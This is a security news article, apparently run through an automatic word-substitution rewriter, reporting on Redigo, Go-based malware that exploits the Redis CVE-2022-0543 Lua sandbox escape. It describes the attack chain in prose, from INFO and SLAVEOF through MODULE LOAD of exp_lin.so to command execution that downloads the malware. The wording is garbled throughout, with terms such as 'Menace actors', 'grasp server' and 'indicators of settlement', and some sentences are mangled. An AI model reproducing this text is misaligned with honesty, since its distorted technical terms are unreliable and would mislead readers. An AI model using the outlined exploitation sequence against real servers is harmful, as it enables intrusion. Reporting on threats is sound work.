New Go-based Redigo malware targets Redis security servers

New Go-based Redigo malware targets Redis security servers

Redigo is a brand new Go-based malware utilized in assaults in opposition to Redis servers affected by the CVE-2022-0543 vulnerability.

Researchers from safety firm AquaSec have found a brand new Go-based malware that’s being utilized in a concentrating on marketing campaign redis servers. Menace actors exploit a crucial vulnerability, which is tracked as CVE-2022-0543in Redis servers (distant dictionary server).

Redis (Distant Dictionary Server) is an open supply in-memory database and cache.

Defect CVE-2022-0543 is a Lua sandbox escape bug affecting Debian and Debian-derived Linux distributions. The vulnerability, rated 10 out of 10 in severity, might be exploited by a distant attacker with the flexibility to execute arbitrary Lua scripts to flee the Lua sandbox and execute arbitrary code on the underlying machine. Juniper Menace Labs researchers mentioned The Muhstik botnet has been noticed concentrating on Redis servers exploiting the CVE-2022-0543 vulnerability.

In March 2022, the US Cybersecurity and Infrastructure Safety Company (CISA) Added this bug to her Known Vulnerability Catalog.

bug Fixed in February 2022, however risk actors proceed to use it for assaults within the wild as a result of availability of a file Proof-of-concept exploit code.

The assault chain begins with scans of the Redis server exposing port 6379 to the Web, then the attackers attempt to join and run the next Redis instructions:

  1. INFO command – This command permits adversaries to obtain details about our Redis server. From the information they obtain, they now know the susceptible server model CVE-2022-0543 (as we defined earlier, the hotspot with this vulnerability was created on goal). This info gives the adversaries with the consent they want to have the ability to exploit the vulnerability and permit them to start making ready the floor for its exploitation.
  2. SLAVEOF commanded – This permits opponents to create an actual copy of the attacking server. This motion will later assist them obtain the shared object that permits the vulnerability to be exploited.
  3. REPLCONF command – This command is used to configure a connection from the grasp server (the attacking server) to the duplicate simply created.
  4. PSYNC command — The brand new duplicate runs this command and begins the replication stream from the grasp. This connection retains the duplicate updated and permits the grasp to ship a stream of instructions. The attacking server recognized because the grasp server makes use of this connection to obtain the shared library exp_lin.so to the duplicate disk. Moreover, this connection can be utilized by enemies as a again door, the place within the occasion of a disconnect in the course of the connection, the duplicate reconnects and tries to acquire the a part of the command stream that was misplaced in the course of the disconnect.
  5. MODULE LOAD command – This permits a module of the downloaded dynamic library to be loaded in stage 4 at runtime. This library permits exploits to use the vulnerability and run arbitrary instructions later.
  6. SLAVEOF commanded no one – This turns off replication and turns the susceptible Redis server right into a grasp server.

Attackers load the library file exp_lin.so and execute the exploit code for the above bug. The file accommodates the system.exec command execution that permits an attacker to execute an arbitrary command and launch the assault.

“The primary use of the command is activated to obtain details about the CPU structure. The second use of the command is to obtain newly detected malware from the attacking server – Redigo. After the malware file is downloaded, the attackers elevate the permissions of the file to execute and execute it (for malware investigation learn beneath) “. is studying analytics Revealed by AquaSec.

Menace actors simulate a Redis connection on port 6379 to keep away from detection.

AquaSec researchers imagine that risk actors use Redigo malware to contaminate Redis and add it to a botnet used to launch denial-of-service (DDoS) assaults, run cryptocurrency miners, or steal knowledge from servers.

The researchers additionally offered indicators of settlement (IOCs) for this topic.

Observe me on Twitter: @employee And the Facebook And the mastodon

Pierluigi Paganini

(Security hacking, redis)





#Gobased #Redigo #malware #targets #Redis #safety #servers

Leave a Comment

Your email address will not be published. Required fields are marked *